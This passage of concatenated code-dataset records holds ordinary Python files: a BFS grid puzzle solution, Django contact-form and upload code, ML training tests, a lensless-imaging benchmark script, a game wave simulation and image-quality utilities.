크기\narea = 0\n\n# 연구소 전체 영역을 순회\nfor r in range(N):\n for c in range(N):\n # 바이러스 위치 담기\n if array_original[r][c] == 2:\n virus_pos.append((r, c))\n # 벽이 아닌 칸이라면, 영역의 크기 1 증가 밑 array_only_wall -1로 초기화\n if array_original[r][c] != 1:\n area += 1\n array_only_wall[r][c] = -1\n # 벽이라면, array_only_wall '-'로 초기화\n if array_original[r][c] == 1:\n array_only_wall[r][c] = '-'\n\n# 바이러스를 놓을 수 있는 모든 경우 생성\ntest_cases = combinations(virus_pos, 
M)\n\n# bfs 함수 구현\ndef bfs(case):\n # 덱 생성\n q = deque([])\n\n # 초기 바이러스 위치(r,c)와 시간(t)을 덱에 담기\n # 초기 바이러스이므로 시간은 0 \n for item in case:\n q.append((item[0],item[1],0))\n visited[item[0]][item[1]] = True\n \n # 연구소를 바이러스로 꽉 채우는 데에 걸리는 시간\n t_max = 0\n # 연구소를 채운 바이러스의 개수\n virus_cnt = M\n\n # 덱이 유지될 때 까지 반복\n while q:\n # 현재 위치 밑 시간\n r, c, t = q.popleft()\n # 상하좌우 네 방향 탐색\n for i in range(4):\n # 탐색할 칸\n rr, cc = r+dr[i], c+dc[i]\n # 만약 탐색할 칸이 연구소의 범위를 넘어가지 않는다면\n if 0<=rr.\r\n# ==============================================================================\r\nimport urllib.parse\r\nimport urllib.request\r\nimport json\r\n\r\nfrom django import forms\r\n\r\nfrom PortfolioSite import settings\r\n\r\nVERIFY_URL = 'https://www.google.com/recaptcha/api/siteverify'\r\n\r\n\r\nclass ContactForm(forms.Form):\r\n # https://en.wikipedia.org/wiki/Hubert_Blaine_Wolfeschlegelsteinhausenbergerdorff,_Sr.\r\n contact_name = forms.CharField(max_length=666, required=True)\r\n contact_email = forms.EmailField(required=True)\r\n message = forms.CharField(max_length=10000, required=True,\r\n widget=forms.Textarea)\r\n\r\n def __init__(self, *args, request=None, **kwargs):\r\n if request is None:\r\n raise ValueError('Missing required kwarg `request` (cannot be '\r\n '`None`)')\r\n self.request = request\r\n super(ContactForm, self).__init__(*args, **kwargs)\r\n\r\n def clean(self):\r\n ca = self.request.POST['g-recaptcha-response']\r\n params = {\r\n 'secret': settings.RECAPTCHA_SECRET_KEY,\r\n 'response': ca,\r\n }\r\n data = urllib.parse.urlencode(params).encode()\r\n req = urllib.request.Request(VERIFY_URL, data=data)\r\n response = urllib.request.urlopen(req)\r\n result = json.loads(response.read().decode())\r\n\r\n status = result.get('success', False)\r\n if not status:\r\n raise forms.ValidationError(\r\n 'Invalid reCAPTCHA. 
Please try again.',\r\n code='invalid',\r\n )\r\n return super(ContactForm, self).clean()\r\n","repo_name":"craymichael/PortfolioSite","sub_path":"portfolio/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10550475295","text":"import os\nfrom pathlib import Path\n\nimport pytest\nfrom hydra.core.hydra_config import HydraConfig\nfrom omegaconf import DictConfig, open_dict\n\nfrom src.train import train\nfrom tests.helpers.run_if import RunIf\n\n\ndef test_train_fast_dev_run(cfg_train: DictConfig) -> None:\n \"\"\"Run for 1 train, val and test step.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.fast_dev_run = True\n cfg_train.trainer.accelerator = \"cpu\"\n train(cfg_train)\n\n\n@RunIf(min_gpus=1)\ndef test_train_fast_dev_run_gpu(cfg_train: DictConfig) -> None:\n \"\"\"Run for 1 train, val and test step on GPU.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.fast_dev_run = True\n cfg_train.trainer.accelerator = \"gpu\"\n train(cfg_train)\n\n\n@RunIf(min_gpus=1)\n@pytest.mark.slow\ndef test_train_epoch_gpu_amp(cfg_train: DictConfig) -> None:\n \"\"\"Train 1 epoch on GPU with mixed-precision.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 1\n cfg_train.trainer.accelerator = \"gpu\"\n cfg_train.trainer.precision = 16\n train(cfg_train)\n\n\n@pytest.mark.slow\ndef test_train_epoch_double_val_loop(cfg_train: DictConfig) -> None:\n \"\"\"Train 1 epoch with validation loop twice per epoch.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 1\n cfg_train.trainer.val_check_interval = 0.5\n train(cfg_train)\n\n\n@pytest.mark.slow\ndef test_train_ddp_sim(cfg_train: DictConfig) -> None:\n \"\"\"Simulate DDP (Distributed Data Parallel) on 2 CPU processes.\n\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n HydraConfig().set_config(cfg_train)\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 2\n cfg_train.trainer.accelerator = \"cpu\"\n cfg_train.trainer.devices = 2\n cfg_train.trainer.strategy = \"ddp_spawn\"\n train(cfg_train)\n\n\n@pytest.mark.slow\ndef test_train_resume(tmp_path: Path, cfg_train: DictConfig) -> None:\n \"\"\"Run 1 epoch, finish, and resume for another epoch.\n\n :param tmp_path: The temporary logging path.\n :param cfg_train: A DictConfig containing a valid training configuration.\n \"\"\"\n with open_dict(cfg_train):\n cfg_train.trainer.max_epochs = 1\n\n HydraConfig().set_config(cfg_train)\n metric_dict_1, _ = train(cfg_train)\n\n files = os.listdir(tmp_path / \"checkpoints\")\n assert \"last.ckpt\" in files\n assert \"epoch_000.ckpt\" in files\n\n with open_dict(cfg_train):\n cfg_train.ckpt_path = str(tmp_path / \"checkpoints\" / \"last.ckpt\")\n cfg_train.trainer.max_epochs = 2\n\n metric_dict_2, _ = train(cfg_train)\n\n files = os.listdir(tmp_path / \"checkpoints\")\n assert \"epoch_001.ckpt\" in files\n assert \"epoch_002.ckpt\" not in files\n\n assert 
metric_dict_1[\"train/acc\"] < metric_dict_2[\"train/acc\"]\n assert metric_dict_1[\"val/acc\"] < metric_dict_2[\"val/acc\"]\n","repo_name":"ashleve/lightning-hydra-template","sub_path":"tests/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":3116,"dataset":"github-code","pt":"77"} +{"seq_id":"16948962984","text":"# #############################################################################\n# benchmark_recon.py\n# =========\n# Authors :\n# Yohann PERRON\n# Eric BEZZAM [ebezzam@gmail.com]\n# #############################################################################\n\n\"\"\"\nBenchmark reconstruction algorithms\n==============\nThis script benchmarks reconstruction algorithms on the DiffuserCam test dataset.\nThe algorithm benchmarked and the number of iterations can be set in the config file : benchmark.yaml.\nFor unrolled algorithms, the results of the unrolled training (json file) are loaded from the benchmark/results folder.\n\"\"\"\n\nimport hydra\nfrom hydra.utils import get_original_cwd\n\nimport time\nimport numpy as np\nimport glob\nimport json\nimport os\nimport pathlib as plib\nfrom lensless.eval.benchmark import benchmark\nimport matplotlib.pyplot as plt\nfrom lensless import ADMM, FISTA, GradientDescent, NesterovGradientDescent\nfrom lensless.utils.dataset import DiffuserCamTestDataset, DigiCamCelebA\nfrom lensless.utils.io import save_image\n\nimport torch\nfrom torch.utils.data import Subset\n\n\n@hydra.main(version_base=None, config_path=\"../../configs\", config_name=\"benchmark\")\ndef benchmark_recon(config):\n\n # set seed\n torch.manual_seed(config.seed)\n np.random.seed(config.seed)\n generator = torch.Generator().manual_seed(config.seed)\n\n downsample = config.downsample\n n_files = config.n_files\n n_iter_range = config.n_iter_range\n\n # check if GPU is available\n if torch.cuda.is_available() and config.device[:4] == \"cuda\":\n device = config.device\n else:\n device = \"cpu\"\n\n # Benchmark dataset\n dataset = config.dataset\n if dataset == \"DiffuserCam\":\n benchmark_dataset = DiffuserCamTestDataset(n_files=n_files, downsample=downsample)\n psf = benchmark_dataset.psf.to(device)\n crop = None\n\n elif dataset == \"DigiCamCelebA\":\n\n dataset = DigiCamCelebA(\n data_dir=os.path.join(get_original_cwd(), config.files.dataset),\n celeba_root=config.files.celeba_root,\n psf_path=os.path.join(get_original_cwd(), config.files.psf),\n downsample=config.files.downsample,\n vertical_shift=config.files.vertical_shift,\n horizontal_shift=config.files.horizontal_shift,\n simulation_config=config.simulation,\n crop=config.files.crop,\n )\n dataset.psf = dataset.psf.to(device)\n psf = dataset.psf\n crop = dataset.crop\n\n # train-test split\n train_size = int((1 - config.files.test_size) * len(dataset))\n test_size = len(dataset) - train_size\n _, benchmark_dataset = torch.utils.data.random_split(\n dataset, [train_size, test_size], generator=generator\n )\n if config.n_files is not None:\n benchmark_dataset = Subset(benchmark_dataset, np.arange(config.n_files))\n else:\n raise ValueError(f\"Dataset {dataset} not supported\")\n\n print(f\"Number of files : {len(benchmark_dataset)}\")\n print(f\"Data shape : {dataset[0][0].shape}\")\n\n model_list = [] # list of algoritms to benchmark\n if \"ADMM\" in config.algorithms:\n model_list.append(\n (\n \"ADMM\",\n ADMM(\n psf,\n mu1=config.admm.mu1,\n mu2=config.admm.mu2,\n mu3=config.admm.mu3,\n tau=config.admm.tau,\n ),\n )\n 
)\n if \"ADMM_Monakhova2019\" in config.algorithms:\n model_list.append((\"ADMM_Monakhova2019\", ADMM(psf, mu1=1e-4, mu2=1e-4, mu3=1e-4, tau=2e-3)))\n if \"FISTA\" in config.algorithms:\n model_list.append((\"FISTA\", FISTA(psf, tk=config.fista.tk)))\n if \"GradientDescent\" in config.algorithms:\n model_list.append((\"GradientDescent\", GradientDescent(psf)))\n if \"NesterovGradientDescent\" in config.algorithms:\n model_list.append(\n (\n \"NesterovGradientDescent\",\n NesterovGradientDescent(psf, p=config.nesterov.p, mu=config.nesterov.mu),\n )\n )\n # APGD is not supported yet\n # if \"APGD\" in config.algorithms:\n # from lensless import APGD\n\n # model_list.append((\"APGD\", APGD(psf)))\n\n results = {}\n output_dir = None\n if config.save_idx is not None:\n\n assert np.max(config.save_idx) < len(\n benchmark_dataset\n ), \"save_idx values must be smaller than dataset size\"\n\n os.mkdir(\"GROUND_TRUTH\")\n for idx in config.save_idx:\n ground_truth = benchmark_dataset[idx][1]\n ground_truth_np = ground_truth.cpu().numpy()[0]\n\n if crop is not None:\n ground_truth_np = ground_truth_np[\n crop[\"vertical\"][0] : crop[\"vertical\"][1],\n crop[\"horizontal\"][0] : crop[\"horizontal\"][1],\n ]\n\n save_image(\n ground_truth_np,\n fp=os.path.join(\"GROUND_TRUTH\", f\"{idx}.png\"),\n )\n # benchmark each model for different number of iteration and append result to results\n # -- batchsize has to equal 1 as baseline models don't support batch processing\n start_time = time.time()\n for model_name, model in model_list:\n\n if config.save_idx is not None:\n # make directory for outputs\n os.mkdir(model_name)\n\n results[model_name] = dict()\n for n_iter in n_iter_range:\n\n print(f\"Running benchmark for {model_name} with {n_iter} iterations\")\n\n if config.save_idx is not None:\n output_dir = os.path.join(model_name, str(n_iter))\n os.mkdir(output_dir)\n\n result = benchmark(\n model,\n benchmark_dataset,\n batchsize=1,\n n_iter=n_iter,\n save_idx=config.save_idx,\n output_dir=output_dir,\n crop=crop,\n )\n results[model_name][int(n_iter)] = result\n\n # -- save results as easy to read JSON\n results_path = \"results.json\"\n with open(results_path, \"w\") as f:\n json.dump(results, f, indent=4)\n proc_time = (time.time() - start_time) / 60\n print(f\"Total processing time: {proc_time:.2f} min\")\n\n # create folder to load results from trained algorithms\n result_dir = os.path.join(get_original_cwd(), \"benchmark\", \"trained_results\")\n if not os.path.isdir(result_dir):\n os.mkdir(result_dir)\n\n # try to load json files with results form unrolled training\n files = glob.glob(os.path.join(result_dir, \"*.json\"))\n unrolled_results = {}\n for file in files:\n model_name = plib.Path(file).stem\n unrolled_results[model_name] = {}\n with open(file, \"r\") as f:\n result = json.load(f)\n\n # get result for each metric\n for metric in result.keys():\n # if list take last value (last epoch)\n if isinstance(result[metric], list):\n unrolled_results[model_name][metric] = result[metric][-1]\n else:\n unrolled_results[model_name][metric] = result[metric]\n\n # Baseline results\n baseline_label = config.baseline\n baseline_results = None\n if dataset == \"DiffuserCam\":\n # (Monakhova et al. 
2019, https://arxiv.org/abs/1908.11502)\n        # -- ADMM (100)\n        if baseline_label == \"MONAKHOVA 100iter\":\n            baseline_results = {\n                \"MSE\": 0.0622,\n                \"LPIPS_Alex\": 0.5711,\n                \"ReconstructionError\": 13.62,\n            }\n        # -- ADMM (5)\n        elif baseline_label == \"MONAKHOVA 5iter\":\n            baseline_results = {\n                \"MSE\": 0.1041,\n                \"LPIPS_Alex\": 0.6309,\n                \"ReconstructionError\": 11.32,\n            }\n        # -- Le-ADMM (Unrolled 5)\n        elif baseline_label == \"MONAKHOVA Unrolled 5iter\":\n            baseline_results = {\n                \"MSE\": 0.0618,\n                \"LPIPS_Alex\": 0.4434,\n                \"ReconstructionError\": 13.70,\n            }\n        # -- Le-ADMM-U (Unrolled 5 + UNet post-denoiser)\n        elif baseline_label == \"MONAKHOVA Unrolled 5iter + UNet\":\n            baseline_results = {\n                \"MSE\": 0.0074,\n                \"LPIPS_Alex\": 0.1904,\n                \"ReconstructionError\": 22.14,\n            }\n        else:\n            raise ValueError(f\"Baseline {baseline_label} not supported\")\n\n    # for each metric, plot the results comparing each model\n    metrics_to_plot = [\"SSIM\", \"PSNR\", \"MSE\", \"LPIPS_Vgg\", \"LPIPS_Alex\", \"ReconstructionError\"]\n    for metric in metrics_to_plot:\n        plt.figure()\n        # plot benchmarked algorithms\n        for model_name in results.keys():\n            plt.plot(\n                n_iter_range,\n                [results[model_name][n_iter][metric] for n_iter in n_iter_range],\n                label=model_name,\n            )\n        # plot baseline as horizontal dashed line\n        if baseline_results is not None:\n            if metric in baseline_results.keys():\n                plt.hlines(\n                    baseline_results[metric],\n                    0,\n                    max(n_iter_range),\n                    linestyles=\"dashed\",\n                    label=baseline_label,\n                    color=\"orange\",\n                )\n\n        # plot unrolled algorithms' results\n        color_list = [\"red\", \"green\", \"blue\", \"orange\", \"purple\"]\n        algorithm_colors = {}\n        for model_name in unrolled_results.keys():\n            # use algorithm name if defined, else use file name\n            if \"algorithm\" in unrolled_results[model_name].keys():\n                plot_name = unrolled_results[model_name][\"algorithm\"]\n            else:\n                plot_name = model_name\n\n            # set color depending on plot name using same color for same algorithm\n            first = False\n            if plot_name not in algorithm_colors.keys():\n                algorithm_colors[plot_name] = color_list.pop()\n                first = True\n            color = algorithm_colors[plot_name]\n\n            # check if metric is defined\n            if metric not in unrolled_results[model_name].keys():\n                continue\n            # if n_iter is undefined, plot as horizontal line\n            if \"n_iter\" not in unrolled_results[model_name].keys():\n                plt.hlines(\n                    unrolled_results[model_name][metric],\n                    0,\n                    n_iter_range[-1],\n                    label=plot_name,\n                    linestyles=\"dashed\",\n                    colors=color,\n                )\n            else:\n                # plot as point\n                if first:\n                    plt.plot(\n                        unrolled_results[model_name][\"n_iter\"],\n                        unrolled_results[model_name][metric],\n                        label=plot_name,\n                        marker=\"o\",\n                        color=color,\n                    )\n                else:\n                    plt.plot(\n                        unrolled_results[model_name][\"n_iter\"],\n                        unrolled_results[model_name][metric],\n                        marker=\"o\",\n                        color=color,\n                    )\n        plt.xlabel(\"Number of iterations\", fontsize=\"12\")\n        plt.ylabel(metric, fontsize=\"12\")\n        if metric == \"ReconstructionError\":\n            plt.legend(fontsize=\"12\")\n        plt.grid()\n        plt.savefig(f\"{metric}.png\")\n\n\nif __name__ == \"__main__\":\n    benchmark_recon()\n","repo_name":"LCAV/LenslessPiCam","sub_path":"scripts/eval/benchmark_recon.py","file_name":"benchmark_recon.py","file_ext":"py","file_size_in_byte":11614,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"77"}
{"seq_id":"21622480210","text":"from django.shortcuts import render\r\nfrom .forms import DocumentForm\r\n# Create your views here.\r\n\r\n\r\ndef upload(request):\r\n    if request.user.is_authenticated: \r\n        # Is it better 
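The plotting loop above reduces to one pattern: a curve per benchmarked algorithm over the iteration counts, plus a published baseline drawn as a dashed horizontal line. A self-contained sketch with hypothetical numbers (not results from the paper or the repo):

import matplotlib.pyplot as plt

n_iter_range = [5, 10, 50, 100]            # made-up iteration counts
psnr = {"ADMM": [15.1, 17.0, 20.2, 21.5]}  # made-up metric values
plt.figure()
for name, values in psnr.items():
    plt.plot(n_iter_range, values, label=name)
# the dashed hlines call is how a fixed literature baseline is overlaid
plt.hlines(19.0, 0, max(n_iter_range), linestyles="dashed", label="baseline", color="orange")
plt.xlabel("Number of iterations", fontsize="12")
plt.ylabel("PSNR", fontsize="12")
plt.legend(fontsize="12")
plt.grid()
plt.savefig("PSNR.png")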
to use @login_required ?\n username = request.user.username\n else:\n username = ''\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n doc = form.save()\n return render(request, 'upload.html', {\n \"form\": DocumentForm(),\n \"uploaded_file_url\": doc.myfile.url,\n \"username\": username,\n })\n else:\n form = DocumentForm()\n return render(request, 'upload.html', {\"form\": form})\n","repo_name":"pratham-shah28/NoCodeML","sub_path":"file_upload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45014921963","text":"from random import random\r\nfrom typing import List, Dict, Type, Union, Optional\r\n\r\nfrom log import debug, game_print\r\nfrom simulation.ai import Ai\r\nfrom simulation.base.dispenser import AttackerDispenser, DefenderDispenser, HealerDispenser, CollectorDispenser\r\nfrom simulation.base.game_object import GameObjects\r\nfrom simulation.base.dropped_item import Food, Egg, Logs, Hammer\r\nfrom simulation.base.terrain import Inspectable, Terrain, F, C\r\nfrom simulation.base.player import Player\r\nfrom simulation.player.attacker import Attacker\r\nfrom .penance import Penance\r\nfrom .players import Players\r\n\r\n\r\nclass Wave:\r\n SPAWN_HAMMER = 0b001 # For hnl_flags comparison of what we need to spawn.\r\n SPAWN_NEAR_LOGS = 0b010\r\n SPAWN_FAR_LOGS = 0b100\r\n\r\n # Only click_ methods AND inspect_ methods AND methods used exclusively by them (helpers)\r\n # AND __init__ AND __call__ should use the self.game property!!\r\n # All other methods should be passed the parameters they need explicitly!\r\n def __init__(self, wave_number: int, tick: int, game: Inspectable):\r\n self.end_flag = False\r\n self.game: Inspectable = game\r\n self.number: int = wave_number\r\n self.game.wave_number = self.number\r\n self.penance: Penance = Penance(self.game)\r\n self.dispensers = {\r\n \"a\": AttackerDispenser(self.game),\r\n \"d\": DefenderDispenser(self.game),\r\n \"h\": HealerDispenser(self.game),\r\n \"c\": CollectorDispenser(self.game),\r\n }\r\n\r\n # Currently, these are three different lists instead of a list of type List[DroppedItem] to ease processing.\r\n self.dropped_food: List[Food] = []\r\n self.dropped_eggs: List[Egg] = []\r\n self.dropped_hnls: List[Union[Hammer, Logs]] = [ # The term hnl will be used to indicate hammer and logs.\r\n Hammer(self.game), Logs(Logs.NEAR, self.game), Logs(Logs.FAR, self.game)\r\n ]\r\n self.hnl_flags = 0b000\r\n\r\n self.game_objects: GameObjects = GameObjects(self.game)\r\n self.start_tick: int = tick\r\n self.correct_calls: Dict[str, Optional[int]] = {\r\n \"a\": None, \"c\": None, \"d\": None, \"h\": None,\r\n }\r\n self.calls: Dict[str, Optional[int]] = { # The keys are accessed in Player.inspect_call,\r\n \"a\": None, \"c\": None, \"d\": None, \"h\": None, # be careful when changing.\r\n }\r\n\r\n def __call__(self) -> bool:\r\n # Wave starts on tick 0.\r\n # All ticks after this point, including the ones passed to the penance are normalized\r\n # with respect to the wave start through the use of self.relative_tick.\r\n #\r\n # Player code also relies on self.game.wave.relative_tick when making decisions.\r\n if self.relative_tick == Inspectable.WAVE and not self.end_flag:\r\n debug(\"Wave.__call__\", \"The wave ended unexpectedly due to a timeout.\")\r\n return False\r\n\r\n # Handle wave end.\r\n if self.end_flag:\r\n return False\r\n\r\n # Call 
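The upload view above only works if DocumentForm is a ModelForm whose model has a FileField named myfile, since form.save() must return an instance exposing doc.myfile.url. A hedged reconstruction of those two definitions -- hypothetical, because the app's models.py and forms.py are not shown here:

# Hypothetical sketch of the app's models.py / forms.py; these classes
# must live inside an installed Django app for the model to register.
from django import forms
from django.db import models


class Document(models.Model):
    myfile = models.FileField(upload_to="documents/")


class DocumentForm(forms.ModelForm):
    class Meta:
        model = Document
        fields = ["myfile"]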
changes.\r\n if self.relative_tick % Inspectable.CALL == 1:\r\n self.game.stall((self.change_call, (), {}))\r\n\r\n # If all the penance are dead and we're on a penance cycle.\r\n if not self.penance():\r\n self.game.stall((self.end, (), {}))\r\n\r\n if self.relative_tick % Inspectable.CYCLE == 0:\r\n # If we need to spawn hammer or logs, we do.\r\n if self.hnl_flags & Wave.SPAWN_HAMMER:\r\n self.dropped_hnls.append(Hammer(self.game))\r\n if self.hnl_flags & Wave.SPAWN_NEAR_LOGS:\r\n self.dropped_hnls.append(Logs(Logs.NEAR, self.game))\r\n if self.hnl_flags & Wave.SPAWN_FAR_LOGS:\r\n self.dropped_hnls.append(Logs(Logs.FAR, self.game))\r\n\r\n self.hnl_flags = 0b000\r\n\r\n return True\r\n\r\n @property\r\n def relative_tick(self) -> int:\r\n return self.game.tick - self.start_tick\r\n\r\n def print(self, *args, **kwargs) -> None:\r\n game_print(\"Wave.print\", f\"Wave {self.number}:\", *args, **kwargs)\r\n self.game.text_payload.append(\r\n \" \".join([str(arg) for arg in (f\"WAVE {self.number}::\", *args)])\r\n )\r\n\r\n def change_call(self) -> None:\r\n self.calls = {\r\n \"a\": None, \"c\": None, \"d\": None, \"h\": None,\r\n }\r\n\r\n for key in self.correct_calls:\r\n if self.correct_calls[key] is None:\r\n if key == \"a\":\r\n call = int(random() * Attacker.CALL_COUNT)\r\n else:\r\n call = int(random() * Player.CALL_COUNT)\r\n else:\r\n if key == \"a\":\r\n call = int(random() * (Attacker.CALL_COUNT - 1))\r\n else:\r\n call = int(random() * (Player.CALL_COUNT - 1))\r\n if call >= self.correct_calls[key]:\r\n call += 1\r\n self.correct_calls[key] = call\r\n self.print(f\"Call {self.relative_tick // Inspectable.CALL} ({Terrain.tick_to_string(self.relative_tick)}).\")\r\n\r\n def end(self) -> None:\r\n self.end_flag = True\r\n self.print(f\"Wave ended ({Terrain.tick_to_string(self.relative_tick)}).\")\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.inspectable: Inspectable = Inspectable(self)\r\n self.players: Optional[Players] = None\r\n self.original_ai: Dict[str, Type[Ai]] = {}\r\n self.ai: Dict[str, Union[Type[Ai], Ai]] = {}\r\n self.tick: int = -1\r\n self.wave: Optional[Wave] = None\r\n\r\n self.runner_movements: List[List[C]] = []\r\n\r\n self.block_map: List[str] = Terrain.new()\r\n\r\n def start_new_wave(self, wave_number: int, runner_movements: List[List[C]]) -> None:\r\n self.set_new_players(self.original_ai) # Keeps AI dictionary unmodified, resets players.\r\n assert 0 <= wave_number < 10, \"The wave (0-indexed) should be between 0 and 9.\"\r\n assert wave_number != 9, \"Wave 10 is not implemented yet in this project.\"\r\n self.tick = -1 # Tick 0 of wave is tick 0 of game is the tick at the first call of wave and game.\r\n self.wave = Wave(wave_number, self.tick + 1, self.inspectable) # self.wave.start_tick is 0.\r\n\r\n self.runner_movements = runner_movements\r\n\r\n self.wave.penance.set_runner_movements(runner_movements.copy())\r\n\r\n for role in self.ai:\r\n ai = self.ai[role]\r\n if isinstance(ai, Ai):\r\n ai.start_wave()\r\n\r\n def set_new_players(self, ai: Dict[str, Type[Ai]]) -> None:\r\n # Garbage collect the old locatables.\r\n self.inspectable.uuids = []\r\n self.inspectable.locatables = []\r\n self.original_ai = ai\r\n self.block_map: List[str] = Terrain.new()\r\n\r\n # Create new players.\r\n self.players: Players = Players(self.inspectable)\r\n for role in ai:\r\n self.ai[role] = ai[role](self.inspectable)\r\n\r\n # Reset wave. 
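Wave.change_call above avoids repeating the previous call without a retry loop: it draws from one fewer option and shifts the draw past the old value. The same trick in isolation (CALL_COUNT is a stand-in for Player.CALL_COUNT):

from random import random

CALL_COUNT = 3  # stand-in for Player.CALL_COUNT

def next_call(previous):
    # With no previous call, any of the CALL_COUNT values is fair game.
    if previous is None:
        return int(random() * CALL_COUNT)
    # Draw from CALL_COUNT - 1 options, then shift values at or above the
    # previous call up by one: the result is uniform over the other calls
    # and guaranteed to differ from `previous` in a single draw.
    call = int(random() * (CALL_COUNT - 1))
    if call >= previous:
        call += 1
    return call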
This method is usually called by Game.start_new_wave, which then creates a new wave too.\r\n        self.wave = None\r\n\r\n    def __call__(self) -> bool:\r\n        assert self.wave is not None, \"Please call start_new_wave before processing the game loop.\"\r\n        assert self.players is not None, \"Please call set_new_players before processing the game loop.\"\r\n\r\n        # Process actions related to the AI actions.\r\n        for role in self.ai:\r\n            if self.ai[role] is not None:\r\n                self.ai[role].__call__()\r\n\r\n        # Call this in main as: while game(): pass;\r\n        # Increment tick.\r\n        self.tick += 1\r\n\r\n        # Process actions related to the wave, and return if the wave ended.\r\n        # While it is generally understood that in the original Runescape, wave actions are not a \"separate\" process\r\n        # to be run in the game cycle, but rather an extension on scroller, and if we were to adhere to original Runescape\r\n        # coding structure, should be part of the `if not self.players(self.tick):` part for MainAttacker, here, our\r\n        # purpose is not to be consistent with the original Runescape coding decisions, which make sense for the\r\n        # original Runescape coding circumstances (weak server machines, hundreds of players per server, lots of\r\n        # minigames / other content, individual checking is infeasible), but instead, to implement coding structure\r\n        # that is coherent, and *logically* consistent with how the original Runescape acts, yet works fine on our\r\n        # circumstances (strong machines, just five players and one minigame, very fast execution required).\r\n        if not self.wave():\r\n            return False\r\n\r\n        # Process actions related to the players, and return if a player died (currently impossible).\r\n        # Player actions NEED to be done after Npc actions. The order is important! This matters for things like\r\n        # manual Healer poisoning (which is a Player action) causing reserve healers to spawn a tick later than\r\n        # automatic Healer poisoning (which is an Npc action).\r\n        if not self.players():\r\n            return False\r\n\r\n        return True\r\n\r\n    def render_map(self, _print: bool = False, players_only: bool = False) -> List[str]:\r\n        tmp = Terrain.new()\r\n\r\n        if self.players is not None:\r\n            for key, player in self.players:\r\n                Terrain.set_letter(player.location, F[key.upper()], tmp)\r\n\r\n        # Npcs render above Players to allow for interacting with said Npc. Never does a player need to interact\r\n        # with another under the current assumptions (no wave 10, no healing).\r\n
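For reference, the hnl_flags bookkeeping used by Wave earlier in this file is an ordinary bit-flag scheme; in isolation:

# Each spawn condition owns one bit (values from the Wave class above),
# so several spawns can be queued in a single int and cleared together.
SPAWN_HAMMER = 0b001
SPAWN_NEAR_LOGS = 0b010
SPAWN_FAR_LOGS = 0b100

flags = SPAWN_HAMMER | SPAWN_FAR_LOGS  # queue two spawns
assert flags & SPAWN_HAMMER            # hammer is queued
assert not flags & SPAWN_NEAR_LOGS     # near logs are not
flags = 0b000                          # reset once the cycle handles them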
        if self.wave is not None and not players_only:\r\n            for key, species in self.wave.penance:\r\n                for npc in species:\r\n                    Terrain.set_letter(npc.location, F[key.lower()], tmp)\r\n\r\n        if _print:\r\n            Terrain.print(tmp)\r\n            game_print(\"Game.render_map\", self.wave.relative_tick)\r\n\r\n        return tmp\r\n\r\n    def print_runners(self) -> None:\r\n        game_print(\"Game.print_runners\", *(f\" {runner}\\n\" for runner in self.wave.penance.runners))\r\n","repo_name":"mmdts/pyba","sub_path":"simulation/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"39307661941","text":"#\r\n# @rajeevp\r\n#\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nclass Utils(object):\r\n    def __init__(self):\r\n        np.random.seed(9076301)\r\n        self.description = \" Utilities\"\r\n        self.scale=3\r\n        self.img_orig = None\r\n        self.img_cubic = None\r\n        self.img_srcnn = None\r\n        self.img_srcnn_np = None\r\n        self.pad = None\r\n\r\n    def __str__(self):\r\n        return self.description\r\n    \r\n    def ssim(self, im1, im2):\r\n        mean1 = np.mean(im1)\r\n        mean2 = np.mean(im2)\r\n        var1 = np.var(im1)\r\n        var2 = np.var(im2)\r\n        covar = np.mean((im1-mean1)*(im2-mean2))\r\n        c1 = np.square(0.01 * 255)\r\n        c2 = np.square(0.03 * 255)\r\n        num = (2 * mean1 * mean2 + c1) * (2 * covar + c2)\r\n        denom = (mean1**2 + mean2**2 + c1) * (var1 + var2 + c2)\r\n        val = num / denom\r\n        return val\r\n\r\n\r\n    def psnr(self, im1, im2):\r\n        diff = (im1 - im2)**2.0\r\n        val = 20*np.log10(255.0/np.sqrt(np.mean(diff)))\r\n        return val\r\n    \r\n    def compare_images(self, img_orig, img_cubic, img_srcnn, img_srcnn_np):\r\n        print(\"***** compare images *****\")\r\n        im = cv2.imread(img_orig, cv2.IMREAD_COLOR)\r\n        im = im[0:im.shape[0]-np.remainder(im.shape[0], self.scale),\r\n                0:im.shape[1]-np.remainder(im.shape[1], self.scale),\r\n                :]\r\n        self.pad = int( ( im.shape[0] - ((im.shape[0]-9+1) -5+1) ) / 2 )\r\n        self.img_orig = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n        self.img_orig = self.img_orig.astype('float')\r\n\r\n        im = cv2.imread(img_cubic, cv2.IMREAD_COLOR)\r\n        self.img_cubic = cv2.cvtColor(im, cv2.COLOR_BGR2YCrCb)[self.pad:-self.pad, self.pad:-self.pad, 0]\r\n        self.img_cubic = self.img_cubic.astype('float')\r\n\r\n        im = cv2.imread(img_srcnn, cv2.IMREAD_COLOR)\r\n        self.img_srcnn = cv2.cvtColor(im, 